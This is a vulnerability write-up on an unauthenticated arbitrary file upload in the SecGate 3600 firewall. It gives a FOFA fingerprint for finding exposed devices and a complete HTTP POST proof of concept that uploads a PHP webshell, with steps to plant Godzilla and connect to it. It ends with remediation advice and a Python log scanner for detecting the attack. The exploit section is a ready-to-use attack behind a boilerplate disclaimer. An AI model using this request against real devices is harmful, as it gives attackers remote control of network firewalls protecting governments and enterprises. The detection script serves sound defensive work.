Arbitrary File Upload Vulnerability in SecGate 3600 Firewall
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Product Introduction
The Wangshen SecGate3600 next-generation ultra-fast firewall (NSG series) is built on Netshen's mature and stable third-generation SecOS operating system, which was developed entirely in-house and has been proven in the market, and it draws on years of product experience in professional firewalls, VPNs, and IPS. This high-performance next-generation firewall is designed for the Internet egress of operators, governments, the military, education, large enterprises, and small and medium-sized enterprises, as an active-defense intelligent security gateway that combines these technologies in one product.
2. Vulnerability overview
The obj_app_upfile interface of the SecGate 3600 firewall contains an arbitrary file upload vulnerability. An unauthenticated attacker can use it to upload arbitrary files and gain control of the server.
3. Affected scope
Wangshen SecGate 3600 Firewall
4. Reproduction environment
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
5. Vulnerability reproduction
PoC
POST /?g=obj_app_upfile HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: text/plain
马子
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
Upload Godzilla.
Verify the URL:
https://your-ip/attachements/1.php
Try to connect.
6. Remediation recommendations
Remove the device's management interface from Internet exposure, and enforce strong authentication on the file upload module.
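To check whether a device has already been hit, the web access log can be searched for the two request patterns described in section 5. The following is an added example, not code from the original article or from the vendor; it assumes the log is available in combined log format, and the extension list and sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed log layout: combined log format (client, timestamp, request line, status).
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Assumed set of extensions the web server would execute.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")

def scan(lines):
    """Return (kind, client, target) findings in log order."""
    uploaders, findings = set(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a request line we can parse
        client, method, target, status = m.groups()
        url = urlsplit(target)
        path = unquote(url.path).lower()
        # Indicator 1: POST to the upload handler named in the overview.
        if method == "POST" and "obj_app_upfile" in parse_qs(url.query).get("g", []):
            uploaders.add(client)
            findings.append(("upload", client, target))
        # Indicator 2: a script under /attachements/ answered with 2xx.
        elif (path.startswith("/attachements/") and path.endswith(SCRIPT_EXT)
              and status.startswith("2")):
            kind = "upload+exec" if client in uploaders else "script-access"
            findings.append((kind, client, target))
    return findings

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "POST /?g=obj_app_upfile HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /attachements/1.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /attachements/logo.png HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [01/Jan/2024:10:02:00 +0000] "GET /attachements/x.PHP HTTP/1.1" 404 0 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding, sep="\t")
```

Any "upload" finding from an address that is not an administrator workstation, and any script file present under the attachements directory, warrants inspection of the device's file system.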